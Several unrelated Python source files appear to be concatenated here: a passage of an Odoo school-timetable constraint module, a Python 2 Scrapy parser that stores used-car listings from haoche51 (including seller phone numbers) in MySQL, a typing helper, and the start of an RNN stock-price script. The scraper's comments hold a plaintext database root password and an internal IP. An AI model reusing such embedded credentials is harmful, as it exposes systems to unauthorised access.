starting_obj = self.env['op.faculty.class.list'].search([('list_id', '=', values['faculty_id']), ('batch_id', '=', values['student_id']), ('subject_id', '=', values['subject_id']), ('activity_tag', 'in', values['activity_tag_id'])])
if not starting_obj:
raise UserError(_("There is no activity for the given details. Please choose another!."))
res = super(SubActivitiesTimeSlots, self).create(values)
return res
@api.model
def default_line(self):
period_list = []
period_dict = {}
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
for time in self.env['op.timing'].search([]):
if day_config:
period_dict = {
'name': time.name,
'is_monday': day_config.tt_monday,
'is_tuesday': day_config.tt_tuesday,
'is_wednesday': day_config.tt_wednesday,
'is_thursday': day_config.tt_thursday,
'is_friday': day_config.tt_friday,
'is_saturday': day_config.tt_saturday,
'is_sunday': day_config.tt_sunday
}
period_list.append((0, 0, period_dict))
return period_list
@api.multi
@api.constrains('subactivities_timeslots_line_ids')
def _check_room_not_available_line(self):
for record in self:
flag = any([True for line in record.subactivities_timeslots_line_ids for d in WEEK_DAYS if getattr(
line, d) != 0 and getattr(line, d) != 1])
if flag:
raise UserError(_("The Value should be 1 or 0."))
@api.onchange('faculty_id')
def onchange_faculty(self):
res = {}
if self.faculty_id:
sub_list = []
batch_list = []
tag_list = []
obj = self.env['op.faculty.class.list'].search([('list_id','=',self.faculty_id.id)])
for fac in obj:
sub_list.append(fac.subject_id.id)
batch_list.append(fac.batch_id.id)
for tag in fac.activity_tag:
tag_list.append(tag.id)
res['domain'] = {'subject_id': [('id', 'in', sub_list)],'student_id':[('id','in',batch_list)],'activity_tag_id':[('id','in',tag_list)]}
self.subject_id = False
self.student_id = False
self.activity_tag_id = False
return res
@api.onchange('student_id')
def onchange_batch(self):
res = {}
if self.student_id:
ids = self.student_id.group_ids.mapped('id')
res['domain'] = {'group_id': [('id', 'in', ids)]}
self.group_id = False
self.subgroup_id = False
return res
@api.onchange('group_id')
def onchange_group(self):
res = {}
if self.group_id:
ids = self.group_id.subgroup_ids.mapped('id')
res['domain'] = {'subgroup_id': [('id', 'in', ids)]}
self.subgroup_id = False
return res
faculty_id = fields.Many2one('op.faculty', "Faculty", required=1)
student_id = fields.Many2one('op.batch', "Batch", required=1)
subject_id = fields.Many2one('op.subject', "Subject", required=1)
activity_tag_id = fields.Many2one(
'op.activity.tags', "Activity Tag", required=1)
weight = fields.Integer("Weight Percentage", default=100)
split_count = fields.Integer("Split Component", default=1)
group_id = fields.Many2one('op.batch.group', "Group")
subgroup_id = fields.Many2one('op.batch.subgroup', "Subgroup")
subactivities_timeslots_line_ids = fields.One2many(
'op.subactivities.timeslots.line', 'subactivities_timeslots_id', "Subactivities Time Slots Line", default=default_line)
class SubActivitiesTimeSlotsLine(models.Model):
_name = 'op.subactivities.timeslots.line'
_description = 'SubActivity Time Slots Line'
name = fields.Char("Periods", required=1)
monday = fields.Integer("Monday", size=1)
tuesday = fields.Integer("Tuesday", size=1)
wednesday = fields.Integer("Wednesday", size=1)
thursday = fields.Integer("Thursday", size=1)
friday = fields.Integer("Friday", size=1)
saturday = fields.Integer("Saturday", size=1)
sunday = fields.Integer("Sunday", size=1)
is_monday = fields.Boolean("Monday?")
is_tuesday = fields.Boolean("Tuesday?")
is_wednesday = fields.Boolean("Wednesday?")
is_thursday = fields.Boolean("Thursday?")
is_friday = fields.Boolean("Friday?")
is_saturday = fields.Boolean("Saturday?")
is_sunday = fields.Boolean("Sunday?")
subactivities_timeslots_id = fields.Many2one(
'op.subactivities.timeslots', "Subactivities Time Slots")
class MinDaysBetweenActivities(models.Model):
_name = 'op.mindays.activities'
_description = 'Minimum days between a set of activities.'
_rec_name = 'min_days'
@api.multi
@api.constrains('activities_ids')
def check_activity_count(self):
for rec in self:
if len(rec.activities_ids) == 1:
raise UserError(_("Please add more than 1 activity."))
@api.multi
@api.constrains('min_days')
def check_min_days_gap(self):
for rec in self:
if rec.min_days < 1:
raise UserError(_("The gap should be greater than 0"))
activities_ids = fields.Many2many('op.faculty.class.list', 'activity_mindays_rel', 'activity_id', 'minday_id', "Activities")
min_days = fields.Integer("Minimum Days", default=1)
same_day = fields.Boolean("Activities are on the same day")
weight = fields.Integer("Weight Percentage", default=100)
class MaxDaysBetweenActivities(models.Model):
_name = 'op.maxdays.activities'
_description = 'Maximum days between a set of activities.'
_rec_name = 'max_days'
@api.multi
@api.constrains('activities_ids')
def check_activity_count(self):
for rec in self:
if len(rec.activities_ids) == 1:
raise UserError(_("Please add more than 1 activity."))
@api.multi
@api.constrains('max_days')
def check_max_days_gap(self):
for rec in self:
if rec.max_days < 1:
raise UserError(_("The gap should be greater than 0"))
activities_ids = fields.Many2many('op.faculty.class.list', 'activity_maxdays_rel', 'activity_id', 'maxday_id', "Activities")
max_days = fields.Integer("Maximum Days", default=1)
weight = fields.Integer("Weight Percentage", default=100)
|
#-*- coding: UTF-8 -*-
import json
import math
import re
import sys
import time
import pandas
import pp
import scrapy
# sys
reload(sys)
sys.setdefaultencoding('utf8')
#load funcs
from Parse_Init import *
from SaveData import *
from PP_Init import *
#basesetting
def Init():
#params
website ='haoche51'
params =ParseInit(website)
#mysql redefine
params['createsql']= """CREATE TABLE IF NOT EXISTS `haoche51` (
`id` bigint(20) NOT NULL auto_increment,
`website` varchar(63) DEFAULT NULL,
`carid` varchar(63) DEFAULT NULL,
`title` varchar(127) DEFAULT NULL,
`pagetitle` varchar(127) DEFAULT NULL,
`url` varchar(127) DEFAULT NULL,
`grabtime` varchar(63) DEFAULT NULL,
`pagetime` varchar(63) DEFAULT NULL,
`parsetime` varchar(63) DEFAULT NULL,
`price1` varchar(63) DEFAULT NULL,
`status` varchar(63) DEFAULT NULL,
`statusplus` varchar(127) DEFAULT NULL,
`makeyear` varchar(63) DEFAULT NULL,
`registerdate` varchar(63) DEFAULT NULL,
`years` varchar(63) DEFAULT NULL,
`mileage` varchar(63) DEFAULT NULL,
`mileperage` varchar(63) DEFAULT NULL,
`color` varchar(63) DEFAULT NULL,
`province` varchar(63) DEFAULT NULL,
`city` varchar(63) DEFAULT NULL,
`region` varchar(63) DEFAULT NULL,
`dealplace` varchar(63) DEFAULT NULL,
`registerplace` varchar(63) DEFAULT NULL,
`changetimes` varchar(63) DEFAULT NULL,
`changedate` varchar(63) DEFAULT NULL,
`Insurance1` varchar(63) DEFAULT NULL,
`Insurance2` varchar(63) DEFAULT NULL,
`yearchecktime` varchar(63) DEFAULT NULL,
`carokcf` varchar(63) DEFAULT NULL,
`carcard` varchar(63) DEFAULT NULL,
`carinvoice` varchar(63) DEFAULT NULL,
`accident` varchar(63) DEFAULT NULL,
`useage` varchar(63) DEFAULT NULL,
`telphone` varchar(63) DEFAULT NULL,
`dealor` varchar(127) DEFAULT NULL,
`brand_name` varchar(63) DEFAULT NULL,
`class_name` varchar(63) DEFAULT NULL,
`guideprice` varchar(63) DEFAULT NULL,
`guidepricetax` varchar(63) DEFAULT NULL,
`newcartitle` varchar(127) DEFAULT NULL,
`newcarurl` varchar(127) DEFAULT NULL,
`geartype` varchar(63) DEFAULT NULL,
`emission` varchar(63) DEFAULT NULL,
`output` varchar(63) DEFAULT NULL,
`level` varchar(63) DEFAULT NULL,
`motor` varchar(63) DEFAULT NULL,
`gear` varchar(63) DEFAULT NULL,
`gearnumber` varchar(63) DEFAULT NULL,
`lengthwh` varchar(63) DEFAULT NULL,
`length` varchar(63) DEFAULT NULL,
`width` varchar(63) DEFAULT NULL,
`height` varchar(63) DEFAULT NULL,
`wheelbase` varchar(63) DEFAULT NULL,
`body` varchar(63) DEFAULT NULL,
`doors` varchar(63) DEFAULT NULL,
`seats` varchar(63) DEFAULT NULL,
`bodystyle` varchar(63) DEFAULT NULL,
`weight` varchar(63) DEFAULT NULL,
`luggage` varchar(63) DEFAULT NULL,
`motortype` varchar(63) DEFAULT NULL,
`method` varchar(63) DEFAULT NULL,
`lwvnumber` varchar(63) DEFAULT NULL,
`compress` varchar(63) DEFAULT NULL,
`maxps` varchar(63) DEFAULT NULL,
`maxnm` varchar(63) DEFAULT NULL,
`fuelnumber` varchar(63) DEFAULT NULL,
`fuelmethod` varchar(63) DEFAULT NULL,
`driveway` varchar(63) DEFAULT NULL,
`fronthang` varchar(63) DEFAULT NULL,
`backhang` varchar(63) DEFAULT NULL,
`assistanttype` varchar(63) DEFAULT NULL,
`frontbrake` varchar(63) DEFAULT NULL,
`backbrake` varchar(63) DEFAULT NULL,
`hubtype` varchar(63) DEFAULT NULL,
`frontwheel` varchar(63) DEFAULT NULL,
`backwheel` varchar(63) DEFAULT NULL,
`bn_bo` varchar(63) DEFAULT NULL,
`bq_br` varchar(63) DEFAULT NULL,
`bs_bp` varchar(63) DEFAULT NULL,
`bx` varchar(63) DEFAULT NULL,
`cc` varchar(63) DEFAULT NULL,
`cc1` varchar(63) DEFAULT NULL,
`cd` varchar(63) DEFAULT NULL,
`ch` varchar(63) DEFAULT NULL,
`ci` varchar(63) DEFAULT NULL,
`dy` varchar(63) DEFAULT NULL,
`dz` varchar(63) DEFAULT NULL,
`ea` varchar(63) DEFAULT NULL,
`eb` varchar(63) DEFAULT NULL,
`ec` varchar(63) DEFAULT NULL,
`ef` varchar(63) DEFAULT NULL,
`em` varchar(63) DEFAULT NULL,
`ei_ej` varchar(63) DEFAULT NULL,
`es` varchar(63) DEFAULT NULL,
`cw` varchar(63) DEFAULT NULL,
`db_dc` varchar(63) DEFAULT NULL,
`dh_di` varchar(63) DEFAULT NULL,
`dl` varchar(63) DEFAULT NULL,
`cq` varchar(63) DEFAULT NULL,
`cu` varchar(63) DEFAULT NULL,
`cv` varchar(63) DEFAULT NULL,
`et` varchar(63) DEFAULT NULL,
`airconditiontype` varchar(63) DEFAULT NULL,
`totalcheck` varchar(511) DEFAULT NULL,
`accidentscore` varchar(63) DEFAULT NULL,
`accidentdesc` varchar(511) DEFAULT NULL,
`outerscore` varchar(63) DEFAULT NULL,
`outerdesc` varchar(511) DEFAULT NULL,
`innerscore` varchar(63) DEFAULT NULL,
`innerdesc` varchar(511) DEFAULT NULL,
`safescore` varchar(63) DEFAULT NULL,
`safedesc` varchar(511) DEFAULT NULL,
`roadscore` varchar(63) DEFAULT NULL,
`roaddesc` varchar(511) DEFAULT NULL,
`desc` varchar(511) DEFAULT NULL,
`img_url` varchar(511) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;"""
params['mysqltable']='haoche51'
# params['mysqltable']=params['website']
# params['mysqlip']="192.168.1.92"
# params['mysqluser']="root"
# params['mysqlpasswd']="Datauser@2016"
# params['mysqldbname']="usedcar"
# params['mysqlport']=3306
# mongo redefine
# params['mongocoll']=params['website']
# params['mongoip']="192.168.1.92"
# params['mongoport']=27071
# params['mongodbname']="usedcar"
# df redefine
# params['bfrate']=0.001
# params['keycol']="statusplus"
# carinfocreate redefine
# params['carinfocreate'] = False
# counts redefine
# params['counts']=0
# size redefine
# params['savesize']=1000
return params
def parse_original(item):
#caritem init
caritem = dict()
# keyinfro
caritem['website'] = item['website']
caritem['url'] = item['url']
caritem['carid'] = re.compile('\/').sub('',re.findall('\/\d+',item['url'])[0])
caritem['grabtime'] = item['grabtime']
caritem['pagetime'] = item['pagetime'] # new
caritem['parsetime'] = time.strftime('%Y-%m-%d %X', time.localtime())
# status
caritem['status'] = str(re.findall('sale|sold', item["status"])[0])
caritem['statusplus'] = item["status"]
return caritem
def parse_keyinfo(dom):
# caritem init
caritem = dict()
# keyinfro
#caritem['carid'] = dom.xpath('//div[@class="rpt-cid"]/text()').re('\d+')[0] \
#if dom.xpath('//div[@class="rpt-cid"]/text()') else '-'
caritem['pagetitle'] = dom.xpath('//title/text()').extract_first() # new
caritem['title'] = dom.xpath('//h1[@id="detail-ctitle"]/text()').extract_first().strip() \
if dom.xpath('//h1[@id="detail-ctitle"]/text()') else '-'
if dom.xpath('//div[@class="ftlf emph"]/span/text()'):
caritem['price1'] = dom.xpath('//div[@class="ftlf emph"]/span/text()').extract_first()
elif dom.xpath('//div[@class="price"]/span[@class="emph"]/text()'):
caritem['price1'] = dom.xpath('//div[@class="price"]/span[@class="emph"]/text()').extract_first()
else: "-"
caritem['makeyear'] = re.compile(u'\u6b3e'+'|'+u'\u5e74').sub('',re.findall('\d+'+u'\u6b3e'+'|'+'\d+'+u'\u5e74',caritem['title'])[0]) \
if re.findall('\d+'+u'\u6b3e'+'|'+'\d+'+u'\u5e74',caritem['title']) else "-"
return caritem
def parse_baseinfo(dom):
# caritem init
caritem = dict()
# baseinfo
if dom.xpath('//div[@class="autotit txac"]/h2/text()').extract_first():
path = dom.xpath('//div[@class="autotit txac"]/h2/text()').extract_first()
caritem['registerdate'] = re.compile('\.').sub('-',re.compile(u'\u4e0a\u724c').sub('',path.split('|')[0]))+'-01' \
if len(path.split('|'))>=1 else "-"
caritem['mileage'] = '.'.join(re.findall('\d+',path.split('|')[1])) \
if len(path.split('|'))>=2 else "-"
caritem['geartype'] = path.split('|')[2] \
if len(path.split('|'))>=3 else "-"
caritem['registerplace'] = re.compile(u'\u724c\u7167').sub('',path.split('|')[3]) \
if len(path.split('|'))>=4 else "-"
caritem['years'] = "-" # new
caritem['mileperage'] = "-" # new
caritem['region'] = dom.xpath('//a[@class="citico"]/text()').extract_first() \
if dom.xpath('//a[@class="citico"]/text()') else "-"
caritem['province'] = "-"
caritem['city'] = "-"
caritem['dealplace'] = dom.xpath('//span[@id="kanche_addr"]/@data-city').extract_first() \
if dom.xpath('//span[@id="kanche_addr"]/@data-city') else "-"
caritem['changetimes'] = re.findall('\d+',dom.xpath('//div[@class="autotit txac"]/h2/text()[2]').extract_first())[0] \
if dom.xpath('//div[@class="autotit txac"]/h2/text()[2]') else "-"
caritem['changedate'] = '-'.join(dom.xpath('//div[@class="autotit txac"]/h2/i/text()').re('\d+')) \
if dom.xpath('//div[@class="autotit txac"]/h2/i/text()') else "-"
return caritem
def parse_certification(dom):
# caritem init
caritem = dict()
# citification
caritem['Insurance1'] = '-'.join(dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[1]').re('\d+')) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[1]') else "-"
caritem['Insurance2'] = re.compile(u'\u65e0').sub('',re.compile(u'\u5546\u4e1a\u9669').sub('',
dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[2]').extract_first().split(u'\u3011')[1])) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[2]') else "-"
caritem['yearchecktime'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[3]').extract_first().split(u'\u3011')[1]) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[3]') else "-"
caritem['carokcf'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[4]').extract_first().split(u'\u3011')[1]) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[4]') else "-"
caritem['carcard'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[5]').extract_first().split(u'\u3011')[1]) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[5]') else "-"
caritem['carinvoice'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[6]').extract_first().split(u'\u3011')[1]) \
if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[6]') else "-"
caritem['accident'] = "-" # new
caritem['useage'] = "-" # new
return caritem
def parse_dealor(dom):
# caritem init
caritem = dict()
# dealer
caritem['telphone'] = dom.xpath('//span[@class="tel-f00-18"]/text()').extract_first() \
if dom.xpath('//span[@class="tel-f00-18"]/text()') else "-"
caritem['dealor'] = re.compile(u'\u8f66\u4e3b'+'|'+u'\u62a5\u4ef7').sub('',dom.xpath('//div[@class="own-nme"]/text()').extract_first()) \
if dom.xpath('//div[@class="own-nme"]/text()') else "-" # new
'''
caritem['dealortype'] = "-" # new
caritem['dealorcompany'] = -" # new
caritem['dealorlocation'] = "-" # new
'''
return caritem
def parse_createinfo(carinfocreate,website,mysqldb):
carinfors_name = dict()
carinfors_name = {u'\u4e0a\u5761\u8f85\u52a9': 'ci', u'\u4f9b\u6cb9\u65b9\u5f0f': 'fuelmethod',
u'\u8f66\u8eab\u7a33\u5b9a\u63a7\u5236(ESP)': 'ch', u'\u8fdb\u6c14\u5f62\u5f0f': 'method',
u'\u6700\u5927\u9a6c\u529b(Ps)': 'maxps', u'\u513f\u7ae5\u5ea7\u6905\u63a5\u53e3': 'bx',
u'\u8f74\u8ddd(mm)': 'wheelbase', u'\u7ea7\u522b': 'level',
u'\u591a\u529f\u80fd\u65b9\u5411\u76d8': 'cu', u'\u524d\u96fe\u706f': 'ef',
u'\u6700\u5927\u626d\u77e9(N*m)': 'maxnm', u'\u65e0\u94a5\u5319\u8fdb\u5165': 'cc1',
u'\u957f\u5bbd\u9ad8(mm)': 'lengthwh', u'\u8f66\u8eab\u7ed3\u6784': 'body',
u'\u524d\u60ac\u67b6\u7c7b\u578b': 'fronthang', u'\u5382\u5546\u6307\u5bfc\u4ef7': 'guideprice',
u'\u65e5\u95f4\u884c\u8f66\u706f': 'ec', u'\u611f\u5e94\u96e8\u5237': 'es',
u'\u6c19\u6c14\u5927\u706f': 'ea', u'\u7535\u52a8\u5929\u7a97': 'dy',
u'\u94dd\u5408\u91d1\u8f6e\u5708': 'hubtype', u'\u5168\u666f\u5929\u7a97': 'dz',
u'ABS \u9632\u62b1\u6b7b': 'cd', u'\u540e\u89c6\u955c\u7535\u52a8\u8c03\u8282': 'em',
u'\u65b9\u5411\u76d8\u6362\u6321': 'cv', u'\u540e\u6392\u5ea7\u6905\u653e\u5012\u65b9\u5f0f': 'dl',
u'\u71c3\u6cb9\u6807\u53f7': 'fuelnumber', u'\u65e0\u94a5\u5319\u542f\u52a8': 'cc',
u'\u4e3b/\u526f\u9a7e\u9a76\u5ea7\u5b89\u5168\u6c14\u56ca': 'bn_bo', u'\u524d\u8f6e\u80ce\u89c4\u683c': 'frontwheel',
u'\u540e\u60ac\u67b6\u7c7b\u578b': 'backhang', u'\u771f\u76ae\u65b9\u5411\u76d8': 'cq',
u'\u538b\u7f29\u6bd4': 'compress', u'\u4e3b/\u526f\u9a7e\u9a76\u5ea7\u7535\u52a8\u8c03\u8282': 'db_dc',
u'\u6574\u5907\u8d28\u91cf(kg)': 'weight', u'\u52a9\u529b\u7c7b\u578b': 'assistanttype',
u'LED \u5927\u706f': 'eb', u'\u53d1\u52a8\u673a': 'motor',
u'\u524d/\u540e\u6392\u5934\u90e8\u6c14\u56ca': 'bs_bp', u'\u53d1\u52a8\u673a\u578b\u53f7': 'motortype',
u'\u524d\u5236\u52a8\u5668\u7c7b\u578b': 'frontbrake', u'\u540e\u5236\u52a8\u5668\u7c7b\u578b': 'backbrake',
u'\u53d8\u901f\u7bb1': 'gear', u'\u524d/\u540e\u6392\u5ea7\u6905\u52a0\u70ed': 'dh_di',
u'\u9a71\u52a8\u65b9\u5f0f': 'driveway', u'\u5b9a\u901f\u5de1\u822a': 'et',
u'\u884c\u674e\u7bb1\u5bb9\u79ef(L)': 'luggage', u'\u6392\u91cf(L)': 'output',
u'\u771f\u76ae/\u4eff\u76ae\u5ea7\u6905': 'cw', u'\u6c7d\u7f38\u6570(\u4e2a)': 'lwvnumber',
u'\u524d/\u540e\u7535\u52a8\u8f66\u7a97': 'ei_ej', u'\u7a7a\u8c03\u63a7\u5236\u65b9\u5f0f': 'airconditiontype',
u'\u524d/\u540e\u6392\u4fa7\u6c14\u56ca': 'bq_br', u'\u540e\u8f6e\u80ce\u89c4\u683c': 'backwheel'}
carinforsdf = pandas.DataFrame(carinfors_name.items(),columns=['name_cn','name_en'])
if carinfocreate == True:
carinforsdf.to_sql(name=website + '_carinfo', con=mysqldb, flavor='mysql',
if_exists='replace')
carinfocreate = False
return carinfors_name
def parse_carinfo1(dom):
# caritem init
caritem = dict()
# carinfo
if dom.xpath('//script[contains(text(),"brand_name")]/text()'):
namelist = dom.xpath('//script[contains(text(),"brand_name")]/text()').extract_first()
brandlocation = namelist.find('brand_name')
classlocation = namelist.find('class_name')
vehiclelocation = namelist.find('vehicle_id')
if brandlocation!=-1 and classlocation!=-1:
caritem['brand_name'] = namelist[brandlocation+12:classlocation-3].strip().strip("'")
caritem['class_name'] = namelist[classlocation+12:vehiclelocation-3].strip().strip("'")
else:
caritem['brand_name'] = "-"
caritem['class_name'] = "-"
caritem['emission'] = re.compile(u'\u6392\u653e').sub('',dom.xpath('//div[@class="autotit txac"]/h2/span[@class="cspt"]/text()').extract_first()) \
if dom.xpath('//div[@class="autotit txac"]/h2/span[@class="cspt"]/text()') else "-"
caritem['color'] = dom.xpath(
u'//div[@class="det-basinfor"]/ul/li/label[contains(text(),"\u8f66\u8eab\u989c\u8272")]/../text()').extract_first() \
if dom.xpath(u'//div[@class="det-basinfor"]/ul/li/label[contains(text(),"\u8f66\u8eab\u989c\u8272")]/../text()') else "-" # new
caritem['guidepricetax'] = dom.xpath('//span[@class="txde"]/text()').extract_first() \
if dom.xpath('//span[@class="txde"]/text()') else "-"
caritem['newcartitle'] = "-"
caritem['newcarurl'] = "-" # new
return caritem
def parse_carinfo2(dom,carinfors_name):
# caritem init
caritem = dict()
#carinfo
mycarinfo=[]
mys = dom.xpath('//div[@class ="parcon-box ftzm ptb20"]/div/ul/li/text()')
for sel in mys:
a=(sel.extract())
mycarinfo.append(a)
#Chinese carinfo
carinfors_cn={}
for i in range(0,len(mycarinfo)-1,2) :
name = mycarinfo[i]
info = mycarinfo[i+1]
inforitem={name:info}
carinfors_cn=dict(carinfors_cn,**inforitem)
#right carinfo
carinfors=dict()
for name in carinfors_name.keys():
if carinfors_cn.has_key(name):
name_en = carinfors_name[name]
infor=carinfors_cn[name]
inforitem={name_en:infor}
carinfors=dict(carinfors,**inforitem)
else:
name_en = carinfors_name[name]
infor='-'
inforitem={name_en:infor}
carinfors=dict(carinfors,**inforitem)
#caritem
for name in carinfors.keys():
caritem[name] = carinfors[name]
if caritem['lengthwh']== "-":
caritem['length'] = "-"
caritem['width'] = "-"
caritem['height'] = "-"
elif len(caritem['lengthwh'].split('*'))>=3:
caritem['length'] = caritem['lengthwh'].split('*')[0]
caritem['width'] = caritem['lengthwh'].split('*')[1]
caritem['height'] = caritem['lengthwh'].split('*')[2]
caritem['guideprice'] = re.compile(u'\uffe5'+'|'+u'\u4e07\u5143').sub('',caritem['guideprice'])
caritem['gearnumber'] = re.compile(u'\u6321'+'|'+u'\u6863').sub('',re.findall('\d+'+u'\u6321'+'|'+'\d+'+u'\u6863',caritem['gear'])[0]) \
if re.findall(u'\u6321'+'|'+u'\u6863',caritem['gear']) else '-'
caritem['doors'] = re.compile(u'\u95e8').sub('',re.findall('\d+'+u'\u95e8',caritem['body'])[0]) \
if re.findall('\d+'+u'\u95e8',caritem['body']) else '-'
caritem['seats'] = re.compile(u'\u5ea7').sub('',re.findall('\d+'+u'\u5ea7',caritem['body'])[0]) \
if re.findall('\d+'+u'\u5ea7',caritem['body']) else '-'
caritem['bodystyle'] = re.findall(u'\u4e24\u53a2'+'|'+u'\u4e09\u53a2',caritem['body'])[0] \
if re.findall(u'\u4e24\u53a2'+'|'+u'\u4e09\u53a2',caritem['body']) else '-'
return caritem
def parse_otherinfo(dom):
# caritem init
caritem = dict()
return caritem
def parse_checkpoints(dom):
# caritem init
caritem = dict()
# desc
descnames = {u'\u5185\u9970\u68c0\u6d4b': 'innerdesc', u'\u8bbe\u5907\u548c\u5b89\u5168\u6027': 'safedesc',
u'\u4e8b\u6545\u6392\u67e5': 'accidentdesc', u'\u673a\u68b0\u548c\u8def\u6d4b': 'roaddesc',
u'\u5916\u89c2\u68c0\u6d4b': 'outerdesc'}
myname = dom.xpath('//h4[@class="dtc-h4"]')
myinfo = dom.xpath('//div[@style="padding-top:6px;"]')
descnames_cn={}
for i in range(0,5) :
name=myname.xpath('text()').extract()[i].strip() if myname.xpath('text()') else '-'
info=myinfo.xpath('text()').extract()[i].strip() if myinfo.xpath('text()') else '-'
inforitem={name:info}
descnames_cn=dict(descnames_cn,**inforitem)
descnames_info=dict()
for name in descnames.keys():
if descnames_cn.has_key(name):
name_en = descnames[name]
infor=descnames_cn[name]
inforitem={name_en:infor}
descnames_info=dict(descnames_info,**inforitem)
else:
name_en = descnames[name]
infor='-'
inforitem={name_en:infor}
descnames_info=dict(descnames_info,**inforitem)
for name in descnames_info.keys():
caritem[name] = descnames_info[name]
#score
scorenames = {u'\u5185\u9970\u68c0\u6d4b': 'innerscore', u'\u8bbe\u5907\u548c\u5b89\u5168\u6027': 'safescore',
u'\u4e8b\u6545\u6392\u67e5': 'accidentscore', u'\u673a\u68b0\u548c\u8def\u6d4b': 'roadscore',
u'\u5916\u89c2\u68c0\u6d4b': 'outerscore'}
mys = dom.xpath('//div[@class="profile-scores"]')
scorenames_cn={}
for i in range(0,5) :
name=mys.xpath('ul/li/text()').extract()[i].strip() if mys.xpath('ul/li/text()') else '-'
info=mys.xpath('ul/li/span/b/text()').extract()[i].strip() if mys.xpath('ul/li/span/b/text()') else '-'
inforitem={name:info}
scorenames_cn=dict(scorenames_cn,**inforitem)
scorenames_info=dict()
for name in scorenames.keys():
if scorenames_cn.has_key(name):
name_en = scorenames[name]
infor=scorenames_cn[name]
inforitem={name_en:infor}
scorenames_info=dict(scorenames_info,**inforitem)
else:
name_en = scorenames[name]
infor='-'
inforitem={name_en:infor}
scorenames_info=dict(scorenames_info,**inforitem)
for name in scorenames_info.keys():
caritem[name] = str(scorenames_info[name])
#total
caritem['totalcheck'] = dom.xpath('//div[@class="ckr-sug"]/text()').extract_first() \
if dom.xpath('//div[@class="ckr-sug"]/text()') else "-"
return caritem
def parse_desc(dom):
# caritem init
caritem = dict()
# more desc
caritem['desc'] = dom.xpath('//meta[@name="description"]/@content').extract_first() \
if dom.xpath('//meta[@name="description"]/@content') else "-" # new
if len(caritem['desc']) > 500:
caritem['desc'] = caritem['desc'][:500]
caritem['img_url'] = dom.xpath('//img[@class="item-img"]/@src').extract_first() \
if dom.xpath('//img[@class="item-img"]/@src') else "-" # new
return caritem
#car parse control
def parse(item):
#-*- coding: UTF-8 -*-
#carinit
caritems=[]
#params
params = Init()
processparamlist =ParseprocessInit(params)
website= processparamlist[0]
carinfocreate=processparamlist[1]
counts=processparamlist[2]
savesize=processparamlist[3]
mysqltable=processparamlist[4]
# connection=processparamlist[5]
# collection=processparamlist[6]
mysqldb=processparamlist[7]
mysqldbc=processparamlist[8]
# df=processparamlist[9]
#
# for i in collection.find().skip(start).limit(step):
# returndf=bloom_check(i['status'],df)
# if not returndf:
# try:
try:
# counts +=1
# print counts
# logging.log(msg="counts:"+str(counts)+','+i['url'], level=logging.INFO)
#parse original:1
# caritem init
# parse original:1
caritem = parse_original(item)
# parse keyinfo:2
content = item['datasave'][1]
dom = scrapy.selector.Selector(text=content)
caritem = dict(caritem, **parse_keyinfo(dom))
# parse baseinfo:3
caritem = dict(caritem, **parse_baseinfo(dom))
# parse certification:4
caritem = dict(caritem, **parse_certification(dom))
# parse dealor:5
caritem = dict(caritem, **parse_dealor(dom))
# parse createinfo:6
carinfors_name = parse_createinfo(carinfocreate,website,mysqldb)
# parse carinfo:7
caritem = dict(caritem, **parse_carinfo1(dom))
caritem = dict(caritem, **parse_carinfo2(dom,carinfors_name))
caritem = dict(caritem, **parse_otherinfo(dom))
# parse checkpoints:8
caritem = dict(caritem, **parse_checkpoints(dom))
# parse desc:9
caritem = dict(caritem, **parse_desc(dom))
#add
caritems.append(caritem)
#save to sql
caritems=savecar(caritems,mysqltable,mysqldb,savesize)
# except:
# try:
# #save exception
# print str(counts)+":" + i["url"]+", parse error."
# # logging.log(msg="counts:" + str(counts) + ',' + i['url']+", parse error.", level=logging.ERROR)
# saveerror(counts,i['url'],website,mysqldb)
# continue
# except:
# pass
# else:
# print "item duplicated!"
# logging.log(msg="counts:" + str(counts) + ',' + i['url'] + ", item duplicated!", level=logging.WARNING)
#final save
except:
pass
savecarfinal(caritems,mysqltable,mysqldb,savesize)
conclose(mysqldb,mysqldbc)
# logging.log(msg="counts:" + str(counts) + ',' + ", One group finish!", level=logging.INFO)
return "One group finish"
# parse(0,200)
#ppexcut(8)
|
import inspect
try:
from typing import GenericMeta # python 3.6
except ImportError:
# in 3.7, GenericMeta doesn't exist but we don't need it
class GenericMeta(type):
pass
def annotation_to_string(annotation):
if annotation is inspect.Signature.empty:
return ""
if inspect.isclass(annotation) and not isinstance(annotation, GenericMeta):
return annotation.__name__
return str(annotation).replace("typing.", "")
|
# Recurrent Neural Network
# Part 1 - Data Preprocessing
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the training set
fore_step = 3
time_step = 60
train_samples = 1144
test_samples = 20
feature_size = 2
volume_downsize = 10000
dataset_train = pd.read_csv('Google_Stock_Price_Train.csv')
training_set = dataset_train.iloc[:, 1:2].values
volume_set = dataset_train.iloc[:, 5:6].values
volume_set = volume_set / volume_downsize
#epochs = 180
#batch_size = 32
# Feature Scaling
